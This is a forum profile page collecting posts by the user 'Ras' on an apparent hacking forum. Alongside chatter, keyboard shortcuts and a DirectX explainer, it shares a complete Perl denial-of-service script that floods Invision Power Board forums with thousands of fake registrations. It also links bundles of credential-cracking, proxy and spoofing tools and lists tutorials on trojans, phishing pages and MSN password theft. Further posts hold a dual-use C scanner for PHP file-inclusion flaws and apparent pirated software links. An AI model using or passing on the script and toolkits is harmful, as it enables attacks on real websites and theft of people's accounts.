Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. Ras

    Supernova

    fara suparare...dar din ce ai scris tu se vede ca esti disperat...
  2. Proxy Tools: -Proxy Hunter 3.1 -Proxyrama 1.7.4 -Forum Proxy Leecher -Charon 0.5.3 -A.P.L 1.3 -AA Tools 5.8 Wordlist Tools: -Athena 1.6 -Parsley -Raptor -VL Strip -Log Sucker 1.3 -S_Wordtool -VCU -ALS Novice -Staph -Horny Stripper -XXX Password Finder Cracking Tools: -Access Diver 4.210 -X-Factor -Sentry 1.4 -Cforce -Form @ -Caecus 1.2 Spoofing Tools: -Sploof 0.90 -Super Mega Spoof -ZSpoof 2.41 -Hyper Spoof Tutorials: -Access Diver -Proxy Hunter -Cforce -Sentry 2 -Form @ -Charon -Raptor Wordlist Creation Link: http://rapidshare.com/files/26462302/CrackingToolkitSuiteAIO.rar
  3. Ras

    Supernova

    nemessis...te rog sa stergi acest topic... nu are rost sa faci acel program public pt ca o sa se raspandeasca, "ca painea calda" aduceti-va aminte cand lumea punea conturi pe rst, iar dupa 2 zile nu mai aveau aceeasi parola...
  4. /* RFI Scanner By DiGitalX (DiGi7alX@Gmail.com) Date: 6/4/2007 -- MicroSystem Team */ #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> //#define _DEBUG //debug mode (for me ) #define DEBUG_ROOT "output" //put the vuln functions here //functions that if a var is in its arguments then possible RFI occurs //IMPORTANT: keep this order char* vuln[] = { "include_once", "include", "require_once", "require", NULL }; //global BOOL bShortDis = FALSE; void usage(char* app) { printf("usage: [-s] %s <root-directory>\n", app); printf("\t-s\tshort display mode\n"); } void banner(void) { printf("RFI Scanner By DiGitalX (DiGi7alX@Gmail.com)\n"); printf("Date: 6/4/2007 -- MicroSystem Team\n\n"); } //return: FALSE if EOF reached, TRUE otherwise BOOL freadline(FILE* f, char* line, int size) { int b, i = 0; //zero line memset(line, 0, size); do { //read one byte b = fgetc(f); //check if EOF if (b == EOF) return FALSE; //check if newline cha reached or line is full if ((b == '\n') || (i == 1023)) return TRUE; *line++ = b; //fill line i++; //increment counter } while (1); return 1; /* unreachable code */ } BOOL php_scanfile(char* file) { char line[1024], line2[1024]; int linenum = 0; BOOL notend; char* tmp, *tmp2, *x; //open file FILE* f = fopen(file, "rb"); //check if (f == NULL) return FALSE; do { //opened, then read line by line notend = freadline(f, line, sizeof(line)); linenum++; //lower the line strcpy(line2, line); CharLower(line2); for (int i = 0; vuln[i] != NULL; i++) { //now line contains one line of code, search for RFI functions //include, include_once, require, require_once tmp = strstr(line2, vuln[i]); if (tmp != NULL) { //line contains vuln function maybe RFI. //check if function tmp += strlen(vuln[i]); //skip function name while (*tmp != '(') { //check if end of line reached or someother char (not whitespace means not function) if (*tmp == '\0') goto next; //then goto next vuln function //check if there's crap between vuln function and the first '(' reached //if so then it's not a vuln function maybe comment or var or string or something else if ((*tmp != ' ') && (*tmp != '\t')) goto next; //just dun bother and goto next vuln function tmp++; //keep incrementing tmp until catching '(' [opening parentheses of the vuln function] } //check for var inside this function tmp2 = tmp; //set tmp2 at begin of include function while (*tmp2 != ')') { tmp2++; //keep incrementing tmp2 until catching ')' [closing parentheses of the include function] //check if end of line reached if (*tmp2 == '\0') goto next; //then goto next vuln function } x = tmp; //set x at begin of include function while ((*x != '$') && (x < tmp2)) x++; //keep incrementing x until catching a var inside include functino or include function closing parentheses //check which condition just holded if (*x == '$') { //BINGO, possible RFI cought printf("possible RFI at line: %u", linenum); //if bShortDis then provide filename if (bShortDis) printf(" in \"%s\"\n", file); else printf("\n"); //otherwise just newline break; //break off the for loop } } next: } if (!notend) break; //NOT not end == end } while (1); fclose(f); return TRUE; } void php_search(void) { WIN32_FIND_DATA wfd; HANDLE fh; char lpBuffer[320]; char *lpFilePart; fh = FindFirstFile("*.*",&wfd); if (fh != INVALID_HANDLE_VALUE) { do { // skip '.' and '..' dirs if (wfd.cFileName[0] == '.') continue; // if dir enter it if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if (SetCurrentDirectory(wfd.cFileName) == TRUE) { php_search(); // recursive call SetCurrentDirectory(".."); } continue; } // otherwise carry on our process if (GetFullPathName(wfd.cFileName,320,lpBuffer,&lpFilePart) == 0) continue; CharLower(lpBuffer); // checking if the extension of the file is php if (memcmp(&lpBuffer[lstrlen(lpBuffer)-3],"php",3) == 0) { //skip if bShortDis is set if (!bShortDis) printf("Scanning %s...\n", lpBuffer); php_scanfile(lpBuffer); } } while (FindNextFile(fh,&wfd) == TRUE); FindClose(fh); // closing find handle } } BOOL begin_rfi_scan(char* root) { //first set the root dir as current dir if (!SetCurrentDirectory(root)) return FALSE; //begin the hunting for php files printf("Beginning Hunting RFI Vulnerabilities...\n"); //if -s is given then inform user that mode is activated if (bShortDis) printf("Short Display Mode Activated\n"); php_search(); printf("Finished of Hunting.\n"); return TRUE; } int main(int argc, char** argv) { int pos = 1; //root position in cmd line //show banner banner(); #ifndef _DEBUG //check if root dir is given in the cmd line if (argc < 2) { //show usage screen and exit usage(argv[0]); return 1; } #endif //-s switch is specified if (strcmp(argv[1], "-s") == 0) { bShortDis = TRUE; //set flag pos = 2; //change root position in cmd line } //root dir is given good, then scan all the files inside this root directory #ifndef _DEBUG if (!begin_rfi_scan(argv[pos])) { #else if (!begin_rfi_scan(DEBUG_ROOT)) { #endif printf("Error: initializing RFI Scanner... Try Again"); return 1; } return 0; } It's a simple RFI-Scanner that scans .php files for possible vulnerable functions such as include(), require() ... etc and then check if there's a variable in the arguments of the function.. if so then it prints out the result for you to check if it is really an RFI/LFI * note: you can put alot of php scripts inside a folder and lauch this scanner against it. the scanner will recursively scan the whole root dir. (provided in cmd line) and provide you with each (possible) buggy function and the script name/line. thx to: DiGitalX
  5. Proxy Tools: Proxy Hunter 3.1 Proxyrama 1.7.4 Charon 0.5.3 A.P.L 1.3 Forum Proxy Leecher 1.02 1030 AA Tools 5.80 Word List Tools: Athena 1.6 Parsley Raptor VL Strip Log Sucker 1.3 S_Wordtool VCU ALS Novice Staph Horny Stripper XXX Password Finder Cracking Tools: Access Diver 4.210 Sentry 1.4 Cforce X Factor Form @ Caecus 1.2 Spoofing Tools: Sploof 0.90 Super Mega Spoof 2.601 Zspoof 2.41 Hyperspoof 2002.12.10 Link: http://rapidshare.com/files/25575709/Password_Hacking_Tools.zip
  6. Advanced Anti Keylogger is a powerful, easy to use anti-spy program that prohibits operation of any keylogger, either currently in use or in development. Once installed, our anti-spy software will protect your privacy immediately and constantly. The most scary and dangerous feature of all spy software is the ability to record a computer user's keystrokes. While you are typing out your password and credit card details online, a hacker could be recording your every keystroke on his computer with the right spy software. So, keystroke-monitoring is the core activity of any spy software. Without this ability, any spyware would be absolutely useless. Advanced Anti Keylogger is the result of extensive mathematical research and modeling carried out by our specialists. The unique protection algorithm of Advanced Anti Keylogger is based on operating principles common to all types of keystroke monitoring programs, both known and unknown, currently in use or in development. Advanced Anti Keylogger prohibits operation of the most dangerous feature of any spy software: recording of a computer user's keystrokes. So Advanced Anti Keylogger works like personal firewall. Unlike other anti-spy software currently available worldwide, Advanced Anti Keylogger does not require spyware database updates. What is more, you will save a lot of time because no hard disk or memory scanning is necessary. Once installed, Advanced Anti Keylogger will protect your privacy immediately and constantly. Link: http://rapidshare.com/files/25411872/advanced-anti-keylogger.zip
  7. ESET Smart Security Public Beta 1 is now available for you to test! This version of ESET Smart Security is for Windows 2000, Windows XP, Server 2003 and Windows Vista-only. Only 32-bit (x86) versions are supported. Support for other operating systems and architectures will be available later. This beta version of ESET Smart Security is not functionally complete and is intended only for experienced users. All of the features and functionality are not yet available in this version, and the documentation and online help are not finished. Beta versions are not production versions and may be unstable. Do not install them on any computer which is used for critical tasks. In the event of a problem, you may need to reinstall the operating system and applications and restore the data from backups to regain use of the PC. Link: http://rapidshare.com/files/25410824/ess_nt32_enu.msi
  8. principal ar fi sa devin miliardar dar anul asta dau capacitatea... tot ce imi doresc in acest moment este sa STIU CA AM LUAT CAPACITATEA si apoi sa merg cu tov la strand toaaaataaa vara
  9. Ras

    XSS in rztzone.net

    de ce nu ai postat tot link-ul? ca sa rezolve adminul problemele...
  10. crede-ma ca nu stiu photoshop si nici nu l-am instalat... asa ca nu stiam ce serial cere...
  11. #!/usr/bin/perl use IO::Socket; ########################################################## ## _______ _______ ______ # ## |______ |______ | \ # ## ______| |______ |_____/ # ## # ##IPB Register Multiple Users Denial of Service # ##Doesn't Work on forums using "Code Confirmation" # ##Created By SkOd # ##SED security Team # ##[url]http://www.sed-team.be[/url] # ##skod.uk@gmail.com # ##ISRAEL # ########################################################## print q{ ############################################################ # Invision Power Board Multiple Users DOS # #Tested on IPB 2.0.1 # # created By SkOd. SED Security Team # ############################################################ }; $rand=rand(10); print "Forum Host: "; $serv = ; chop ($serv); print "Forum Path: "; $path = ; chop ($path); for ($i=0; $i<9999; $i++) { $name="sedXPL_".$rand.$i; $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1"; $len = length $data; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; print $get1 "POST ".$path."index.php HTTP/1.0\n"; print $get1 "Host: ".$serv."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$len."\n\n"; print $get1 $data; syswrite STDOUT, "+"; } print "Forum shuld be Dosed. Check it out...\n";
  12. 1- Video PHP Injection By Thorking 2- Video sobre Implantando um Backdoor em um servidor e fazendo conex?o reversa By ThorKing 3- Video mostrando como quebrar senhas de arquivos ZIP By ThorKing 4- Video keylogger Ardamax By Thorking 5- Video que mostra como recuperar senhas MSN salvas no PC By ThorKing 6- Video sobre Criptografia By ThorKing 7- Video Acunetix Scanner de Vulnerabilidades By Thorking 8- Video Configurando Firewall XP By ThorKing 9- Video Perl" Exploit Kullanimi" 10- Video JPEG Admin-Exploit 11- Video Remote File Inclusion, ?rnek bir saldiri 12- Video Rootserver hacking 4 Noobs 13- Video MD5-password-cracken 14- Video Server Rooting 15- Video Windows Server Rooting (Remote Desktop Connection) 16- Video Xss Genis Anlatimli Video Cooke ? 17- Video Zone-h Alma..! (mostra como registrar um deface no zone-h 18- Video Pegando IP pelo MSN com o NetCat 19- Validando seu Windows XP Como Original 20- Video ensinando como derrubar uma pessoa no MSN 21- Video ensinando a criar pagina falsa do ORKUT By zelogatto 22- Video ensinando a criar pagina falsa do ORKUT By Fvox 23- Video-Curso Completo de Sound Forge 24- Video Executando Um Killer Com Seu Server [invisivel] 25- Video-Aula de C capitulo 1 by Nilton 26- Video-Aula de C capitulo 2 by Nilton 27- Video-Aula de C capitulo 3 by Nilton 28- Video Beast (Trojan) indetectavel Baixar 29- Video SpyOne(Trojan) indetectavel by hackerbrasilll 30- Video SpyOne(Trojan) indetectavel by 374gj 31- Video de como deixar o MSN amarelinho(receber msg no celular) 31- Video de como Pegar serial sem precisar entrar nas paginas 32- Video Aprenda a configurar uma Maquina Virtual 33- Video que explica No-ip, para que serve e como funciona 34- Video sobre esteganografia By Souzadc 35- Video sobre Deface em PhpBB 36- Video sobre Deface em PhpBB 2.0.11 37- Video sobre Deface em PhpBB 2.0.11 e anteriores by Mig16 r 38- Video sobre Controle de acesso 39- Video sobre burlar jogos em Java na Web baixar 40- Video sobre conex?o reversa usando NetCat +Winrar baixar 41- Video sobre senha segura baixar 42- Video mostrando como mudar avatar google baixar 43- Video sobre captura de e-mails na rede By Papai Noel baixar 44- Video hacking wireless By Oliver baixar 45- Video Attack Tool Kit +Programa usado baixar 46- Video hackeando CilemNews By H4x0r baixar 47- Terminal Server / RDP Cracking By ChrisG visualizar 48- MS-SQL Exploitation Video B ChrisG visualizar 49- RealVNC 4.1 Authentication Bypass using Metasploit Framework By ChrisG Visualizar 50- Exploiting Mic*ft RPC DCOM using Metasploit Framework BY ChrisG visualizar 51-Exploiting Mic*ft RPC DCOM using Metasploit Framework(Spanish)By freed0m visualizar 52- Webmin File Disclosure Demo By pseudo visualizar 53- WMF + SWF Exploit By ZoNe_VoRTeX visualizar 54- Cross Site Scripting HQ 0 Day fUSiON visualizar 55- Windows Server Rooting (Remote Desktop Connection) Chironex visualizar 56- 0-DAY Simple SQL Injection By x128 visualizar 57- Intruders D-Link Wireless Access Point Configuration Disclosure By diesl0w visualizar 58- vBulletin XSS Demonstration with Session Hijacking BY splices visualizar 59- CRLF (Carriage Return and Line Feed) Injection Demonstration By Paisterist visualizar 60- PHP Remote File Inclusion / Windows Backdoor By WiLdBoY visualizar 61- Heap Overflow Basics (Spanish) By Paisterist visualizar 62- (WBB Portal) Cross-Site Scripting Using Unsanitized jpg File By Tontonq visualizar 63- Multiple Websites Embedded SWF File Vulnerability Demonstration By Shadow visualizar 64- Simple ASP Administrator SQL Injection by (ruiner_zer0) visualizar 65- JPortal CMS SQL Injection Exploit in Action by (ruiner_zer0) visualizar 66- phpBB Session Handling Authentication Bypass Demonstration (ruiner_zer0) visualizar 67- JSP 1 or 1 SQL Injection Demonstration by (ruiner_zer0) visualizar 68- Demonstration of Blind MySQL Injection (bsqlbf) By aramosf visualizar 69- Demonstration of Blind MySQL Injection (mysql_bftools) By reversing visualizar 70- KF Hacking up Bluetooth with his WIDCOMM Code Kevin Finisterre visualizar 71- Tunneling Exploits Through SSH (whoppix) By muts visualizar 72- Cracking WEP in 10 Minutes (kismac) By muts visualizar 73- Cracking WEP in 10 Minutes (whoppix) BY muts visualizar 74- Muts Showing WMF 0day in Action (metasploit) BY muts visualizar 75- Reverse Engineering with LD_PRELOAD Qnix visualizar 76- Qnix Demonstrating Exploration of Simple Buffer Overflows By Qnix visualizar 77- MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) By wezyr Baixar 78- FTP Root After Remote File Inclusion By DarkFuneral Baixar 79- Simple XSS by dark funeral Baixar Baixar 80- PHPBB 2.0.X Cookie Session Bypass By DarkFuneral Baixar 81- Php Nuke manual cookie creation By Azza Visualizar 88- Videos based on Buffer Overflows By hypn0 Baixar 83- Ipb 2.1.* <= 2.1.6 admin password change By Azza Visualizar 84- PHPNUKE 7.X SQL Injection In Search Module by DarkFuneral Baixar 85- install VNc in shell By HeXHaCKeRs baixar passwd hexhackers 86- EffeTech HTTP Sniffer visualizar 87-Criando Worms By Lynn Visualizar 88-Video Usando o Brutus AET 2.0 Visualizar 89- Video usando Angry IP Scanner Visualizar 90- Video usando o Cain (WinXP) Visualizar 91- Video Battle Pong - Nuke Visualizar 92-Video usando o Languard Visualizar 93-Video usando o Languard II Visualizar 94-Video usando Petite 2.0 Visualizar 95-Video sobre Conex?o Reversa Visualizar 96-Video conectando por TelNet Visualizar 97-Video Removendo Trojan WF By Silvio Santos Visualizar 98-Video Mudando ?cones Execut?vel Visualizar 99- Video pegando IP Atrav?s do Outlock Visualizar 100-Video Pegando senha pelo google Visualizar 101- Video Derrubando a V?tima Visualizar 102- Video Assist?ncia Remota Visualizar 103-Video Pegando Senhas do Orkut Visualizar 104-Video Entre sem Votar em sites Visualizar 105- VideoEntre Sem Votar em sites II Visualizar 106-Video Fake MSN Visualizar 107- Video usando o Trojan Back Orifice Visualizar 108-Video usando o trojan Net Devil Visualizar 109-Video Juntando Arquivos Visualizar 110-Video Juntando Arquivos II Visualizar 111- Video Quem te Bloqueou no MSN Visualizar 112-Video Derrubando Contatos MSN Visualizar 113-Video Derrubando Contatos MSN II Visualizar 114-Video Flood no MSN Visualizar By Porps Visualizar 115-Video Veja quem te Deletou MSN visualizar 116-Video Pegando Senhas do MSN Visualizar 117-Video Pegando IP pelo MSN Visualizar 118- Video Hacker de MSN Visualizar 119-Video Diversos Truques MSN Visualizar 120-Video Usando o Nuke Visualizar 121-Video usando o N-Map Visualizar 122-Video usando o Trojan CIA 1.3 Visualizar 123-Video usando o Trojan Beast 2.7 Visualizar 124-Video Tune up (Temas Windows) Visualizar 125-Video Configurando Avast By Thiago Visualizar 126- Video Spam no Email Visualizar 127-Video Photoshop B?sicoBy Allexxandre Visualizar 128-Video usando o Trojan Sub Seven visualizar 129- Video Protegendo - se Visualizar 130-Video Protegendo - se II visualizar 131-Video Binder do Beast Visualizar 132-Video sobre SQL Injection Visualizar 133- Video sobre SQL Injection II Visualizar 134-Video Configurando Ad-Ware 136-Video Navegando An? 137-Video Camuflando IP 138-Video o trojan Usando o Net Bus 1.7 139-Video Instalando trojan NetBus Pro 140-Video Configurando trojan NetBus Pro 141-Video Conectando trojan NetBus Pro 142-Video Jogo de V?rus (Patch) 143-Video Languard R3X 144-Video Configurando SpyBot Link: Link: http://www.forcehacker.kit.net/videos.html
  13. Description : Adobe Photoshop CS2 Features: *Revolutionary Vanishing Point technology lets you clone, paint, and paste elements that automatically match the perspective of the surrounding image area *Smart Objects perform nondestructive scaling, rotating, and warping of raster and vector graphics with Smart Objects *Multi-image Digital Camera raw file Processing - process multiple images simultaneously, adjusting exposure, shadows, and brightness and contrast -- all while you continue working *Image Warp creates packaging mock-ups by wrapping an image around any shape or stretching, curling, and bending an image *Multiple layer control for selecting, moving, grouping and transforming objects intuitievly. Link: Link : http://www.click-now.net/download/Adobe_Photoshop_CS2.htm
  14. din cate stiu pe vechiul forum... am dat la search si nu am gasit
  15. SwiftDisc Burning Features: DVD-R DL 8.54GB DVD+R DL 8.5GB Burn large files bigger than 4.0GB on DVD+R DL and DVD-R DL media Audio Track and Indexes Editor (Wave Editor) Hierarchical File System (Mac OS X) Bootable CD and DVD DVD+R DL 8.5GB, DVDR, DVDRW, CD-R, CD-RW Burn Video DVD (DVD+R DL 8.5GB) Rip Audio CD to WAV, Windows Media Audio (WMA) and Vorbis Audio (OGG) Windows Media Audio 9s Lossless Encoding Vorbis Audio 1.1 Encoding Download CD information from Internet Copy DVD Copy CD (RAW CD, RAW CD + Subchannel) Audio CD Burning with CD-TEXT. Burn Audio CD from WAV, AU, AIF, WMA and MP3 files "On the fly" conversion from MP3, WMA and WAV Burn MP3 DVD Burn MP3 CD Burn WMA DVD Burn WMA CD Burn Data DVD (UDF, ISO, Joliet, Bridge) Burn Data CD (UDF, ISO, Joliet) Create DVD ISO image Create CD ISO image Burn ISO image to DVD Burn ISO image to CD "Drag and Drop" Data CD and Data DVD editing. Long Joliet and UDF filenames Burn data incrementally Import data sessions Format DVD+RW Erase DVD-RW Erase CD-RW Navigate easily through the screens guided by the Burning Wizard Buffer-Under-Run Protection: BURN-Proof, JustLink, Power-Burn, SafeBurn, SmartBurn, SeamlessLink Burn on multiple devices simultaneously. Link: http://rapidshare.com/files/22710412/Swift_Disc_Burning.rar
  16. Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day: Windows key + R = Run menu This is usually followed by: cmd = Command Prompt iexplore + "web address" = Internet Explorer compmgmt.msc = Computer Management dhcpmgmt.msc = DHCP Management dnsmgmt.msc = DNS Management services.msc = Services eventvwr = Event Viewer dsa.msc = Active Directory Users and Computers dssite.msc = Active Directory Sites and Services Windows key + E = Explorer ALT + Tab = Switch between windows ALT, Space, X = Maximize window CTRL + Shift + Esc = Task Manager Windows key + Break = System properties Windows key + F = Search Windows key + D = Hide/Display all windows CTRL + C = copy CTRL + X = cut CTRL + V = paste Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program. Keyboard Shortcuts [Alt] and [Esc] Switch between running applications [Alt] and letter Select menu item by underlined letter [Ctrl] and [Esc] Open Program Menu [Ctrl] and [F4] Close active document or group windows (does not work with some applications) [Alt] and [F4] Quit active application or close current window [Alt] and [-] Open Control menu for active document Ctrl] Lft., Rt. arrow Move cursor forward or back one word Ctrl] Up, Down arrow Move cursor forward or back one paragraph [F1] Open Help for active application Windows+M Minimize all open windows Shift+Windows+M Undo minimize all open windows Windows+F1 Open Windows Help Windows+Tab Cycle through the Taskbar buttons Windows+Break Open the System Properties dialog box acessability shortcuts Right SHIFT for eight seconds........ Switch FilterKeys on and off. Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off. Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off. SHIFT....... five times Switch StickyKeys on and off. NUM LOCK...... for five seconds Switch ToggleKeys on and off. explorer shortcuts END....... Display the bottom of the active window. HOME....... Display the top of the active window. NUM LOCK+ASTERISK....... on numeric keypad Display all subfolders under the selected folder. NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder. NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder. LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder. RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder. Type the following commands in your Run Box (Windows Key + R) or Start Run devmgmt.msc = Device Manager msinfo32 = System Information cleanmgr = Disk Cleanup ntbackup = Backup or Restore Wizard (Windows Backup Utility) mmc = Microsoft Management Console excel = Microsoft Excel (If Installed) msaccess = Microsoft Access (If Installed) powerpnt = Microsoft PowerPoint (If Installed) winword = Microsoft Word (If Installed) frontpg = Microsoft FrontPage (If Installed) notepad = Notepad wordpad = WordPad calc = Calculator msmsgs = Windows Messenger mspaint = Microsoft Paint wmplayer = Windows Media Player rstrui = System Restore netscp6 = Netscape 6.x netscp = Netscape 7.x netscape = Netscape 4.x waol = America Online control = Opens the Control Panel control printers = Opens the Printers Dialog internetbrowser type in u're adress "google", then press [Right CTRL] and [Enter] add www. and .com to word and go to it For Windows XP: Copy. CTRL+C Cut. CTRL+X Paste. CTRL+V Undo. CTRL+Z Delete. DELETE Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE Copy selected item. CTRL while dragging an item Create shortcut to selected item. CTRL+SHIFT while dragging an item Rename selected item. F2 Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW Highlight a block of text. CTRL+SHIFT with any of the arrow keys Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys Select all. CTRL+A Search for a file or folder. F3 View properties for the selected item. ALT+ENTER Close the active item, or quit the active program. ALT+F4 Opens the shortcut menu for the active window. ALT+SPACEBAR Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4 Switch between open items. ALT+TAB Cycle through items in the order they were opened. ALT+ESC Cycle through screen elements in a window or on the desktop. F6 Display the Address bar list in My Computer or Windows Explorer. F4 Display the shortcut menu for the selected item. SHIFT+F10 Display the System menu for the active window. ALT+SPACEBAR Display the Start menu. CTRL+ESC Display the corresponding menu. ALT+Underlined letter in a menu name Carry out the corresponding command. Underlined letter in a command name on an open menu Activate the menu bar in the active program. F10 Open the next menu to the right, or open a submenu. RIGHT ARROW Open the next menu to the left, or close a submenu. LEFT ARROW Refresh the active window. F5 View the folder one level up in My Computer or Windows Explorer. BACKSPACE Cancel the current task. ESC SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing. Use these keyboard shortcuts for dialog boxes: To Press Move forward through tabs. CTRL+TAB Move backward through tabs. CTRL+SHIFT+TAB Move forward through options. TAB Move backward through options. SHIFT+TAB Carry out the corresponding command or select the corresponding option. ALT+Underlined letter Carry out the command for the active option or button. ENTER Select or clear the check box if the active option is a check box. SPACEBAR Select a button if the active option is a group of option buttons. Arrow keys Display Help. F1 Display the items in the active list. F4 Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts: Display or hide the Start menu. WIN Key Display the System Properties dialog box. WIN Key+BREAK Show the desktop. WIN Key+D Minimize all windows. WIN Key+M Restores minimized windows. WIN Key+Shift+M Open My Computer. WIN Key+E Search for a file or folder. WIN Key+F Search for computers. CTRL+WIN Key+F Display Windows Help. WIN Key+F1 Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L Open the Run dialog box. WIN Key+R Open Utility Manager. WIN Key+U accessibility keyboard shortcuts: Switch FilterKeys on and off. Right SHIFT for eight seconds Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK Switch StickyKeys on and off. SHIFT five times Switch ToggleKeys on and off. NUM LOCK for five seconds Open Utility Manager. WIN Key+U shortcuts you can use with Windows Explorer: Display the bottom of the active window. END Display the top of the active window. HOME Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+) Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-) Collapse current selection if it's expanded, or select parent folder. LEFT ARROW Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
  17. DirectX explained Ever wondered just what that enigmatic name means? Gaming and multimedia applications are some of the most satisfying programs you can get for your PC, but getting them to run properly isn’t always as easy as it could be. First, the PC architecture was never designed as a gaming platform. Second, the wide-ranging nature of the PC means that one person’s machine can be different from another. While games consoles all contain the same hardware, PCs don’t: the massive range of difference can make gaming a headache. To alleviate as much of the pain as possible, Microsoft needed to introduce a common standard which all games and multimedia applications could follow – a common interface between the OS and whatever hardware is installed in the PC, if you like. This common interface is DirectX, something which can be the source of much confusion. DirectX is an interface designed to make certain programming tasks much easier, for both the game developer and the rest of us who just want to sit down and play the latest blockbuster. Before we can explain what DirectX is and how it works though, we need a little history lesson. DirectX history Any game needs to perform certain tasks again and again. It needs to watch for your input from mouse, joystick or keyboard, and it needs to be able to display screen images and play sounds or music. That’s pretty much any game at the most simplistic level. Imagine how incredibly complex this was for programmers developing on the early pre-Windows PC architecture, then. Each programmer needed to develop their own way of reading the keyboard or detecting whether a joystick was even attached, let alone being used to play the game. Specific routines were needed even to display the simplest of images on the screen or play a simple sound. Essentially, the game programmers were talking directly to your PC’s hardware at a fundamental level. When Microsoft introduced Windows, it was imperative for the stability and success of the PC platform that things were made easier for both the developer and the player. After all, who would bother writing games for a machine when they had to reinvent the wheel every time they began work on a new game? Microsoft’s idea was simple: stop programmers talking directly to the hardware, and build a common toolkit which they could use instead. DirectX was born. How it works At the most basic level, DirectX is an interface between the hardware in your PC and Windows itself, part of the Windows API or Application Programming Interface. Let’s look at a practical example. When a game developer wants to play a sound file, it’s simply a case of using the correct library function. When the game runs, this calls the DirectX API, which in turn plays the sound file. The developer doesn’t need to know what type of sound card he’s dealing with, what it’s capable of, or how to talk to it. Microsoft has provided DirectX, and the sound card manufacturer has provided a DirectX-capable driver. He asks for the sound to be played, and it is – whichever machine it runs on. From our point of view as gamers, DirectX also makes things incredibly easy – at least in theory. You install a new sound card in place of your old one, and it comes with a DirectX driver. Next time you play your favourite game you can still hear sounds and music, and you haven’t had to make any complex configuration changes. Originally, DirectX began life as a simple toolkit: early hardware was limited and only the most basic graphical functions were required. As hardware and software has evolved in complexity, so has DirectX. It’s now much more than a graphical toolkit, and the term has come to encompass a massive selection of routines which deal with all sorts of hardware communication. For example, the DirectInput routines can deal with all sorts of input devices, from simple two-button mice to complex flight joysticks. Other parts include DirectSound for audio devices and DirectPlay provides a toolkit for online or multiplayer gaming. DirectX versions The current version of DirectX at time of writing is DirectX 9.0. This runs on all versions of Windows from Windows 98 up to and including Windows Server 2003 along with every revision in between. It doesn’t run on Windows 95 though: if you have a machine with Windows 95 installed, you’re stuck with the older and less capable 8.0a. Windows NT 4 also requires a specific version – in this case, it’s DirectX 3.0a. With so many versions of DirectX available over the years, it becomes difficult to keep track of which version you need. In all but the most rare cases, all versions of DirectX are backwardly compatible – games which say they require DirectX 7 will happily run with more recent versions, but not with older copies. Many current titles explicitly state that they require DirectX 9, and won’t run without the latest version installed. This is because they make use of new features introduced with this version, although it has been known for lazy developers to specify the very latest version as a requirement when the game in question doesn’t use any of the new enhancements. Generally speaking though, if a title is version locked like this, you will need to upgrade before you can play. Improvements to the core DirectX code mean you may even see improvements in many titles when you upgrade to the latest build of DirectX. Downloading and installing DirectX need not be complex, either. Upgrading DirectX All available versions of Windows come with DirectX in one form or another as a core system component which cannot be removed, so you should always have at least a basic implementation of the system installed on your PC. However, many new games require the very latest version before they work properly, or even at all. Generally, the best place to install the latest version of DirectX from is the dedicated section of the Microsoft Web site, which is found at www.microsoft.com/windows/directx. As we went to press, the most recent build available for general download was DirectX 9.0b. You can download either a simple installer which will in turn download the components your system requires as it installs, or download the complete distribution package in one go for later offline installation. Another good source for DirectX is games themselves. If a game requires a specific version, it’ll be on the installation CD and may even be installed automatically by the game’s installer itself. You won’t find it on magazine cover discs though, thanks to Microsoft’s licensing terms. Diagnosing problems Diagnosing problems with a DirectX installation can be problematic, especially if you don’t know which one of the many components is causing your newly purchased game to fall over. Thankfully, Microsoft provides a useful utility called the DirectX Diagnostic Tool, although this isn’t made obvious. You won’t find this tool in the Start Menu with any version of Windows, and each tends to install it in a different place. The easiest way to use it is to open the Start Menu’s Run dialog, type in dxdiag and then click OK. When the application first loads, it takes a few seconds to interrogate your DirectX installation and find any problems. First, the DirectX Files tab displays version information on each one of the files your installation uses. The Notes section at the bottom is worth checking, as missing or corrupted files will be flagged here. The tabs marked Display, Sound, Music, Input and Network all relate to specific areas of DirectX, and all but the Input tab provide tools to test the correct functioning on your hardware. Finally, the More Help tab provides a useful way to start the DirectX Troubleshooter, Microsoft’s simple linear problem solving tool for many common DirectX issues.
